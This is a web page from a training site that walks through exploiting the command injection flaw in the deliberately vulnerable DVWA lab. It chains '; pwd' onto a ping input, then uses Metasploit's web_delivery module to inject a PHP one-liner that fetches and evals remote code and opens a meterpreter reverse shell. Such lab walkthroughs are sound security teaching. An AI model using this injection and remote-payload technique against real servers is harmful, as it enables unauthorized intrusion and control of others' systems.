<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="description" content="Damn Vulnerable Web App - Command Injection">

        <meta property="og:site_name" content="Hacker Lab Learn"/>
        <meta property="og:title" content="Command Injection | Hacker Lab Learn"/>
        <meta property="og:description" content="Damn Vulnerable Web App - Command Injection"/>
        <meta property="og:url" content="https://my-jigsaw-docs.com/walkthroughs/damn-vulnerable-web-app/command-injection"/>
        <meta property="og:image" content="/assets/img/logo.png"/>
        <meta property="og:type" content="website"/>

        <meta name="twitter:image:alt" content="Hacker Lab Learn">
        <meta name="twitter:card" content="summary_large_image">

        
        <title>Hacker Lab Learn | Command Injection</title>

        <link rel="home" href="https://my-jigsaw-docs.com">
        <link rel="icon" href="/favicon.ico">

        
                    <!-- Insert analytics code here -->
        
        <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,300i,400,400i,700,700i,800,800i" rel="stylesheet">
        <link rel="stylesheet" href="/assets/build/css/main.css?id=829c17c8b6b463371e17">

            </head>

    <body class="flex flex-col justify-between min-h-screen bg-grey-lightest text-grey-darkest leading-normal font-sans">
        <header class="flex items-center shadow bg-white border-b h-24 mb-8 py-4" role="banner">
            <div class="container flex items-center max-w-4xl mx-auto px-4 lg:px-8">
                <div class="flex items-center">
                    <a href="/" title="Hacker Lab Learn home" class="inline-flex items-center">
                        <img class="h-8 md:h-10 mr-3" src="/assets/img/logo.svg" alt="Hacker Lab Learn logo" />

                        <h1 class="text-lg md:text-2xl text-blue-darkest font-semibold hover:text-blue-dark my-0 pr-4">Hacker Lab Learn</h1>
                    </a>
                </div>

                <div class="flex flex-1 justify-end items-center text-right md:pl-10">
                                    </div>
            </div>

                <button class="flex justify-center items-center bg-blue border border-blue h-10 mr-4 px-5 rounded-full lg:hidden focus:outline-none"
    onclick="navMenu.toggle()"
>
    <svg id="js-nav-menu-show" xmlns="http://www.w3.org/2000/svg"
        class="fill-current text-white h-9 w-4" viewBox="0 0 32 32"
    >
        <path d="M4,10h24c1.104,0,2-0.896,2-2s-0.896-2-2-2H4C2.896,6,2,6.896,2,8S2.896,10,4,10z M28,14H4c-1.104,0-2,0.896-2,2  s0.896,2,2,2h24c1.104,0,2-0.896,2-2S29.104,14,28,14z M28,22H4c-1.104,0-2,0.896-2,2s0.896,2,2,2h24c1.104,0,2-0.896,2-2  S29.104,22,28,22z"/>
    </svg>

    <svg id="js-nav-menu-hide" xmlns="http://www.w3.org/2000/svg"
        class="hidden fill-current text-white h-9 w-4" viewBox="0 0 36 30"
    >
        <polygon points="32.8,4.4 28.6,0.2 18,10.8 7.4,0.2 3.2,4.4 13.8,15 3.2,25.6 7.4,29.8 18,19.2 28.6,29.8 32.8,25.6 22.2,15 "/>
    </svg>
</button>

        </header>

        <main role="main" class="w-full flex-auto">
            <section class="container max-w-4xl mx-auto px-6 md:px-8 py-4">
    <div class="flex flex-col lg:flex-row">
        <nav id="js-nav-menu" class="nav-menu hidden lg:block">
            <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/getting-started"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Getting Started
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">WebGoat 8 Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/general"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            General
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-introduction"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Introduction)
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-advanced"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Advanced)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Damn Vulnerable Web App (DVWA) Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/brute-force"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Brute Force
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/command-injection"
            class="lvl1  active font-semibold text-blue nav-menu__item hover:text-blue"
        >
            Command Injection
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/cross-site-request-forgery"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Cross Site Request Forgery (CSRF)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Ubuntu Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/8-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            8 of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/5-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            5 of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Windows Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/king-of-diamonds"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            King of Diamonds
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/ace-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Hearts
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/jack-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Jack of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Essentials</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/essentials/scp"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            scp
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh-keygen"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh-keygen
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/browser-developer-tools"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Browser Developer Tools
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <a href="/contribute"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Contribute
        </a>
    
    </li>
    </ul>
        </nav>

        <div class="w-full lg:w-3/5 break-words pb-16 lg:pl-4" v-pre>
            <h1>Command Injection</h1>
<p>1. Navigate to the command injection lesson and enter the IP address of your Kali Linux instance.</p>
<p>The page result looks like it might just be running the <code>ping &lt;ip you enetered&gt;</code> on the server, and then just copying the output into the web page. </p>
<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/command-injection/2-ping.PNG">
<p>2. Let's test this theory by submitting <code>165.227.62.246; pwd</code> into the web form.</p>
<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/command-injection/3-pwd.PNG">
<p>3. Looks like the web page shows the output from both the <code>ping</code> and the <code>pwd</code> command.
That confirms it, this form has a command injection vulnerability!</p>
<p>Let's break down how we know this:</p>
<ol>
<li>We guessed that the site is just running <code>ping &lt;ip you entered&gt;</code> on the server based on the format of the output.</li>
<li>We tested this theory by submitting <code>165.227.62.246; pwd</code> to the form. (replace <code>165.227.62.246</code> with the IP address of you Kali Linux instance.)</li>
<li>When the server  substitutes <code>165.227.62.246; pwd</code> for <code>&lt;ip you entered&gt;</code> you get a chained command <code>ping 165.227.62.246; pwd</code></li>
<li>The <code>;</code> we added to our IP address tells the server that the ping command is done, and now we're starting a new command (<code>pwd</code>).</li>
<li>The web page returned the output we expected (the output from both commands). </li>
<li>Which means our theory is correct!</li>
</ol>
<p>We now know we can use use the <code>;</code> operator to chain any command we want onto the original ping command.</p>
<p>4. Lets take advantage of this command injection vulnerability.
Login to your Kali Linux instance and start up metasploit.
Refer to the <a href="/walkthroughs/damn-vulnerable-web-app/quickstart">Quickstart Guide</a> if you forgot how to do this.</p>
<p>Once you're in your metasploit console, use the <code>use exploit/multi/script/web_delivery</code> auxiliary module.
This module will allow us to exploit the command injection vulnerability we just found.</p>
<pre><code class="language-bash"># select the web_delivery module
msf5 &gt; use exploit/multi/script/web_delivery</code></pre>
<p>You can always show what kind of options your current module supports with the <code>show options</code> command.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python</code></pre>
<p>You can also show what targets your current module supports with the <code>show targets</code> command.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   PSH (Binary)</code></pre>
<p>Let's start by setting some options</p>
<pre><code class="language-bash"># we know the web server uses PHP
msf5 exploit(multi/script/web_delivery) &gt; set target 1
target =&gt; 1

# replace 165.227.62.246 with the IP address of your Kali Linux instance
msf5 exploit(multi/script/web_delivery) &gt; set LHOST 165.227.62.246
LHOST =&gt; 165.227.62.246

# thehackerlab.co set's up Kali Linux instances with open ports at 9990-9999
# replace 9990 with an open port if you're using a manual setup
msf5 exploit(multi/script/web_delivery) &gt; set SRVPORT 9990
SRVPORT =&gt; 9990

# thehackerlab.co set's up Kali Linux instances with open ports at 9990-9999
# replace 9991 with an open port if you're using a manual setup
msf5 exploit(multi/script/web_delivery) &gt; set lPORT 9991
lPORT =&gt; 9991

# we want to setup a meterpreter shell on the target server
msf5 exploit(multi/script/web_delivery) &gt; set payload php/meterpreter/reverse_tcp
payload =&gt; php/meterpreter/reverse_tcp</code></pre>
<blockquote>
<p>Hint: Checkout the official documentation for the <a href="https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery">web delivery</a> module to learn more about what options are available, or how they work.
You can also checkout the official documentation for the <a href="https://www.rapid7.com/db/modules/payload/php/meterpreter/reverse_tcp">php/metperpreter/reverse_tcp</a> payload, or <a href="https://metasploit.help.rapid7.com/docs/working-with-payloads">working with payloads</a> in general.</p>
</blockquote>
<p>This is what everything should look like if you've set all the options correctly.</p>
<pre><code>msf5 exploit(multi/script/web_delivery) &gt; show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  9990             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  165.227.62.246   yes       The listen address (an interface may be specified)
   LPORT  9991             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   PHP</code></pre>
<p>Now run the exploit.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; run
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 165.227.62.246:9992:-  -
[*] Started reverse TCP handler on 0.0.0.0:9992
[*] Using URL: http://0.0.0.0:9990/28rrQym9drJ
[*] Local IP: http://172.19.0.2:9990/28rrQym9drJ
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://165.227.62.246:9990/28rrQym9drJ'));"</code></pre>
<p>5. The exploit generates a PHP command that, when run on the target server, will create a meterpreter shell you can use to interact with the target server.
In this case the full generated command is:</p>
<pre><code class="language-bash">php -d allow_url_fopen=true -r "eval(file_get_contents('http://165.227.62.246:9990/28rrQym9drJ'));"</code></pre>
<p>Recall that we can take advantage of a command injection flaw to run any command we want on the target web server by using the <code>;</code> operator to chain commands together.</p>
<pre><code class="language-bash">&lt;ip address&gt;; &lt;any command we want to run&gt;</code></pre>
<p>So let's substitute our exploit command in for <code>&lt;any command we want to run&gt;</code></p>
<pre><code class="language-bash"># replace 165.227.62.246 with the IP address of your Kali Linux instance.
165.227.62.246; php -d allow_url_fopen=true -r "eval(file_get_contents('http://165.227.62.246:9990/28rrQym9drJ'));"`</code></pre>
<img src="/assets/images/walkthroughs/damn-vulnerable-web-app/command-injection/4-run.PNG">
<p>6. The previous step will attempt to run a script on the web server that will connect back to your Kali instance.
If it's successful you'll see something like this:</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; [*] 167.99.163.173   web_delivery - Delivering Payload
[*] Sending stage (38247 bytes) to 167.99.163.173
[*] Meterpreter session 1 opened (172.19.0.2:9992 -&gt; 167.99.163.173:44950) at 2019-06-07 23:36:57 +0000</code></pre>
<p>7. Get a list of open sessions.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; sessions

Active sessions
===============

  Id  Name  Type                   Information                   Connection
  --  ----  ----                   -----------                   ----------
  1         meterpreter php/linux  www-data (33) @ c82110c8185d  172.19.0.2:9991 -&gt; 167.99.163.173:44950 (167.99.163.173)</code></pre>
<p>8. Connect to your session. </p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; sessions -i 1
[*] Starting interaction with 1...

meterpreter &gt;</code></pre>
<p>Congratulations! This is a terminal on the target machine!</p>        </div>
    </div>
</section>
        </main>

        <script src="/assets/build/js/main.js?id=ba3916078c37342007f3"></script>

        <script>
    const navMenu = {
        toggle() {
            const menu = document.getElementById('js-nav-menu');
            menu.classList.toggle('hidden');
            menu.classList.toggle('lg:block');
            document.getElementById('js-nav-menu-hide').classList.toggle('hidden');
            document.getElementById('js-nav-menu-show').classList.toggle('hidden');
        },
    }
</script>

        <footer class="bg-white text-center text-sm mt-12 py-4" role="contentinfo">
            <ul class="flex flex-col md:flex-row justify-center list-reset">
                <li class="md:mr-2">
                    &copy; <a href="https://thehackerlab.co" title="The Hacker Lab website">The Hacker Lab, LLC</a> 2019.
                </li>

                <li>
                    Built with <a href="http://jigsaw.tighten.co" title="Jigsaw by Tighten">Jigsaw</a>
                    and <a href="https://tailwindcss.com" title="Tailwind CSS, a utility-first CSS framework">Tailwind CSS</a>.
                </li>
            </ul>
        </footer>
    </body>
</html>
